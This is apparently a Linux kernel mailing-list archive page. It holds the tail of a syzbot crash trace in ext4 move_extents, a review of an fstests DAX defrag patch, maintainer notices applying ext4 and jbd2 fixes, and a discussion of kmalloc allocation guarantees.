lock_acquire+0x106/0x350 kernel/locking/lockdep.c:5868
down_write+0x3a/0x50 kernel/locking/rwsem.c:1625
inode_lock include/linux/fs.h:1029 [inline]
lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254
ext4_move_extents+0x20f/0x3950 fs/ext4/move_extent.c:589
__ext4_ioctl fs/ext4/ioctl.c:1657 [inline]
ext4_ioctl+0x3092/0x4b40 fs/ext4/ioctl.c:1922
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:597 [inline]
__se_sys_ioctl+0xff/0x170 fs/ioctl.c:583
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7fb592a3ce59
Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffc3443e838 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 00007fb592cb5fa0 RCX: 00007fb592a3ce59
RDX: 0000200000000040 RSI: 00000000c028660f RDI: 0000000000000005
RBP: 00007fb592ad2d6f R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007fb592cb5fac R14: 00007fb592cb5fa0 R15: 00007fb592cb5fa0
</TASK>
---
This report is generated by a bot. It may contain errors.
See https://goo.gl/tpsmEJ for more information about syzbot.
syzbot engineers can be reached at syzkaller@googlegroups.com.
syzbot will keep track of this issue. See:
https://goo.gl/tpsmEJ#status for how to communicate with syzbot.
If the report is already addressed, let syzbot know by replying with:
#syz fix: exact-commit-title
If you want syzbot to run the reproducer, reply with:
#syz test: git://repo/address.git branch-or-commit-hash
If you attach or paste a git patch, syzbot will apply it before testing.
If you want to overwrite report's subsystems, reply with:
#syz set subsystems: new-subsystem
(See the list of subsystem names on the web dashboard)
If the report is a duplicate of another one, reply with:
#syz dup: exact-subject-of-another-report
If you want to undo deduplication, reply with:
#syz undup
^ permalink raw reply
* Re: [PATCH v2] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Darrick J. Wong @ 2026-06-04 14:54 UTC (permalink / raw)
To: Disha Goel
Cc: fstests, linux-ext4, linux-fsdevel, linux-xfs, ritesh.list,
ojaswin
In-Reply-To: <20260604122305.39805-1-disgoel@linux.ibm.com>
On Thu, Jun 04, 2026 at 05:53:05PM +0530, Disha Goel wrote:
> Online defragmentation is not supported on ext4 DAX-enabled filesystems.
> The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
> on DAX files.
>
> Add an ext4-specific check in _require_defrag() to skip tests when DAX
> is enabled, avoiding false failures on ext4/301-304, ext4/308, and
> generic/018.
>
> XFS defrag works with DAX, so this check is ext4-specific.
>
> Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
> Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
> ---
> Changes in v2:
> - Made the check ext4-specific as XFS defrag works with DAX
> (feedback from Darrick)
> - Use __scratch_uses_fsdax() instead of grepping MOUNT_OPTIONS
> - Removed unnecessary comment as _notrun message is self-explanatory
>
> common/defrag | 4 ++++
> 1 file changed, 4 insertions(+)
>
> diff --git a/common/defrag b/common/defrag
> index 055d0d0e..f17271cd 100644
> --- a/common/defrag
> +++ b/common/defrag
> @@ -6,6 +6,10 @@
>
> _require_defrag()
> {
> + if [ "$FSTYP" = "ext4" ] && __scratch_uses_fsdax; then
Shouldn't this be:
ext4)
__scratch_uses_fsdax && _notrun "..."
;;
in the case statement below?
--D
> + _notrun "ext4 online defrag not supported with DAX"
> + fi
> +
> case "$FSTYP" in
> xfs)
> # xfs_fsr does preallocates, require "falloc"
> --
> 2.45.1
>
^ permalink raw reply
* Re: [RFC v8 0/7] ext4: fast commit: snapshot inode state for FC log
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: Zhang Yi, Andreas Dilger, Li Chen
Cc: Theodore Ts'o, Steven Rostedt, Masami Hiramatsu,
Mathieu Desnoyers, linux-ext4, linux-trace-kernel, linux-kernel
In-Reply-To: <20260515091829.194810-1-me@linux.beauty>
On Fri, 15 May 2026 17:18:20 +0800, Li Chen wrote:
> (This RFC v8 series is rebased onto linux-next master as of 2026-05-09,
> commit e98d21c170b0 ("Add linux-next specific files for 20260508"), and
> depends on patch "ext4: fix fast commit wait/wake bit mapping on
> 64-bit" [0]).
>
> Zhang Yi in RFC v3 review pointed out that postponing lockdep assertions only
> masks the issue, and that sleeping in ext4_fc_track_inode() while holding
> i_data_sem can form a real ABBA deadlock if the fast commit writer also needs
> i_data_sem while the inode is in FC_COMMITTING.
>
> [...]
Applied, thanks!
[1/7] ext4: fast commit: snapshot inode state before writing log
commit: e9c6e0b8e096255feb71ec996c77bdfbe9c36e91
[2/7] ext4: lockdep: handle i_data_sem subclassing for special inodes
commit: 7f473f971382d73a58e386afa7efdaac294b89f0
[3/7] ext4: fast commit: avoid waiting for FC_COMMITTING
commit: b3060e96533dc3157fc6d3d45dc19927c566977b
[4/7] ext4: fast commit: avoid self-deadlock in inode snapshotting
commit: 2b9b216628fd9352f9c791701c8990d05736aa90
[5/7] ext4: fast commit: avoid i_data_sem by dropping ext4_map_blocks() in snapshots
commit: 22d887e06a57261df58404c8dce50c4ef37549ed
[6/7] ext4: fast commit: add lock_updates tracepoint
commit: d2f6e83bbbef31169ea363af4277f5c09c914eda
[7/7] ext4: fast commit: export snapshot stats in fc_info
commit: 56bb0b64f4b198bad5ce674509c10793d471148f
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
^ permalink raw reply
* Re: [PATCH] ext4: fix LOGFLUSH shutdown ordering to allow ordered-mode data writeback
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: linux-ext4, Zhang Yi
Cc: Theodore Ts'o, linux-fsdevel, linux-kernel, adilger.kernel,
libaokun, jack, ojaswin, ritesh.list, yi.zhang, yizhang089,
yangerkun, yukuai
In-Reply-To: <20260424104201.1930823-1-yi.zhang@huaweicloud.com>
On Fri, 24 Apr 2026 18:42:01 +0800, Zhang Yi wrote:
> In EXT4_GOING_FLAGS_LOGFLUSH mode, the EXT4_FLAGS_SHUTDOWN flag was set
> before calling ext4_force_commit(). This caused ordered-mode data
> writeback (triggered by journal commit) to fail with -EIO, since
> ext4_do_writepages() checks for the shutdown flag. The journal would
> then be aborted prematurely before the commit could succeed.
>
> Fix this by calling ext4_force_commit() first, then setting the
> shutdown flag, so that pending data can be written back correctly.
>
> [...]
Applied, thanks!
[1/1] ext4: fix LOGFLUSH shutdown ordering to allow ordered-mode data writeback
commit: d99748ef1695ce17eaf51c64b7a06952fa7cddab
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
^ permalink raw reply
* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Matthew Wilcox @ 2026-06-04 14:46 UTC (permalink / raw)
To: Theodore Tso
Cc: Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi,
Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <ximvn6jwgtam665a4droqkp73o55kwvd5uukyidwjesmysobth@oe7rigpsjfkz>
I'm hoping you'll take my "Remove special jbd2 slabs" patch instead of
this one, but answering here anyway ...
On Thu, Jun 04, 2026 at 10:05:52AM -0400, Theodore Tso wrote:
> On Thu, Jun 04, 2026 at 09:14:57AM +0300, Mike Rapoport wrote:
> > There's no memory overhead when order == 1.
> > As for the CPU overhead, the difference for the fast path allocations is
> > not measurable and for the slow path it is anyway determined by the amount
> > of reclaim involved rather than by what allocator is used.
>
> Thanks for confirming!
>
> > Larger allocations (> PAGE_SIZE * 2) go straight to the page allocator.
That is a detail subject to change. I have some ideas ...
What users are guaranteed is that kmalloc returns physically contiguous
memory. And that if it's a power-of-two that it's naturally aligned.
> Another question: Today, we can either use kmalloc() (or
> __get_free_pages, previously) or vmalloc(). Is there a way a file
> system can say, "give me physically contiguous pages if possible, but
> if it's too hard --- with some TBD to specify what 'too hard' means or
> can be specified --- fall back to a vmalloc-style approach, with the
> page table / TLB overhead that this might imply"?
>
> I suppose we could do it with kmalloc() with some flags which to
> prevent forced reclaim / compaction, and if that fails, then fall back
> to vmalloc(). Is there a better way?
I think we'd like to avoid doing that. A lot of code has various
workarounds for deficiencies in the memory allocator (some of which have
been fixed and thus the workarounds only complicate matters). If the
memory allocator(s) aren't providing what you need (be it performance
under load, fragmentation avoidance or whatever), it's best to get that
fixed rather than having fallback paths.
There have been people who have suggested "What if folios could be
physically discontiguous", and sometimes I've hhumoured them, but the
simplifications enabled by requiring folios to be contiguous are quite
immense.
We've been trying to move in the direction of exposing more high-level
APIs so people can say "I want to allocate 10MB of memory but it doesn't
need to be contiguous" and have the allocator either fail the whole
thing up front or make efforts to ensure that you get the whole 10MB.
It's a lot more efficient than calling get_free_page() 2500 times
and possibly having reclaim run a dozen different times.
(anyone else try to create a brd that's actually larger than system ram?
;-)
^ permalink raw reply
* Re: [PATCH v6 0/2] ext4: add hash Kunit tests and optimize str2hashbuf
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: Andreas Dilger, Baokun Li, Jan Kara, Ojaswin Mujoo,
Ritesh Harjani, Zhang Yi, Guan-Chun Wu
Cc: Theodore Ts'o, linux-ext4, linux-kernel, edward062254,
visitorckw, david.laight.linux
In-Reply-To: <20260531080019.3794809-1-409411716@gms.tku.edu.tw>
On Sun, 31 May 2026 16:00:17 +0800, Guan-Chun Wu wrote:
> This series adds Kunit tests for fs/ext4/hash.c and refactors
> the str2hashbuf_{signed,unsigned}() helpers.
>
> Patch 1 adds test coverage for ext4fs_dirhash(), including the main
> hash variants and relevant edge cases.
>
> Patch 2 simplifies the str2hashbuf helper implementation by processing
> input in 4-byte chunks and removing function-pointer dispatch. This also
> reduces overhead and shows roughly 2x improvement on longer inputs in
> local testing.
>
> [...]
Applied, thanks!
[1/2] ext4: add Kunit coverage for directory hash computation
commit: 3147cac6c1929f26b4687993b8c7af5b7b34496d
[2/2] ext4: improve str2hashbuf by processing 4-byte chunks and removing function pointers
commit: 3ca1d19c1971ac4f25478eafb741e726bf2d5954
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
^ permalink raw reply
* Re: [PATCH] ext4: fix fast commit wait/wake bit mapping on 64-bit
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: Li Chen
Cc: Theodore Ts'o, Andreas Dilger, Baokun Li, Jan Kara,
Ojaswin Mujoo, Ritesh Harjani, Zhang Yi, linux-ext4, linux-kernel,
Sashiko AI review
In-Reply-To: <20260513085818.552432-1-me@linux.beauty>
On Wed, 13 May 2026 16:58:17 +0800, Li Chen wrote:
> On 64-bit, ext4 dynamic inode states live in the upper half of i_flags,
> and ext4_test_inode_state() applies the corresponding +32 offset.
>
> The fast-commit wait and wake paths open-coded the wait key with the raw
> EXT4_STATE_* value. Add small helpers for the state wait word and bit,
> and use them for the FC_COMMITTING and FC_FLUSHING_DATA waits so the wait
> key follows the same mapping as the state helpers.
>
> [...]
Applied, thanks!
[1/1] ext4: fix fast commit wait/wake bit mapping on 64-bit
commit: 8b3bc93fee6771775243665a0cf31857d6659775
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
^ permalink raw reply
* Re: [PATCH v2] jbd2: fix integer underflow in jbd2_journal_initialize_fast_commit()
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: Jan Kara, Harshad Shirwadkar, Junrui Luo
Cc: Theodore Ts'o, linux-ext4, linux-kernel, Yuhao Jiang, stable
In-Reply-To: <SYBPR01MB7881663C927DE9D7BBF4D1DFAF062@SYBPR01MB7881.ausprd01.prod.outlook.com>
On Wed, 13 May 2026 17:28:40 +0800, Junrui Luo wrote:
> jbd2_journal_initialize_fast_commit() validates journal capacity by
> checking (journal->j_last - num_fc_blks < JBD2_MIN_JOURNAL_BLOCKS).
> Both j_last and num_fc_blks are unsigned, so when num_fc_blks exceeds
> j_last the subtraction wraps to a large value, bypassing the bounds
> check.
>
> The resulting underflow corrupts j_last, j_fc_first, and j_free,
> leading to journal abort.
>
> [...]
Applied, thanks!
[1/1] jbd2: fix integer underflow in jbd2_journal_initialize_fast_commit()
commit: 289a2ca0c9b7eae74f93fc213b0b971669b8683d
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
^ permalink raw reply
* Re: [PATCH] jbd2: check for aborted handle in jbd2_journal_dirty_metadata()
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
To: jack, Deepanshu Kartikey
Cc: Theodore Ts'o, linux-ext4, linux-kernel,
syzbot+98f651460e558a21baae
In-Reply-To: <20260507050605.50081-1-kartikey406@gmail.com>
On Thu, 07 May 2026 10:36:05 +0530, Deepanshu Kartikey wrote:
> jbd2_journal_dirty_metadata() unconditionally dereferences
> handle->h_transaction at function entry to obtain the journal pointer:
>
> transaction_t *transaction = handle->h_transaction;
> journal_t *journal = transaction->t_journal;
>
> However, h_transaction may legitimately be NULL for an aborted handle.
> The is_handle_aborted() helper in include/linux/jbd2.h explicitly
> treats !h_transaction as one of the aborted states:
>
> [...]
Applied, thanks!
[1/1] jbd2: check for aborted handle in jbd2_journal_dirty_metadata()
commit: 8fc197cf366beaabaeb46575c8cf46fe5076b943
Best regards,
--
Theodore Ts'o <tytso@mit.edu>
^ permalink raw reply
page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox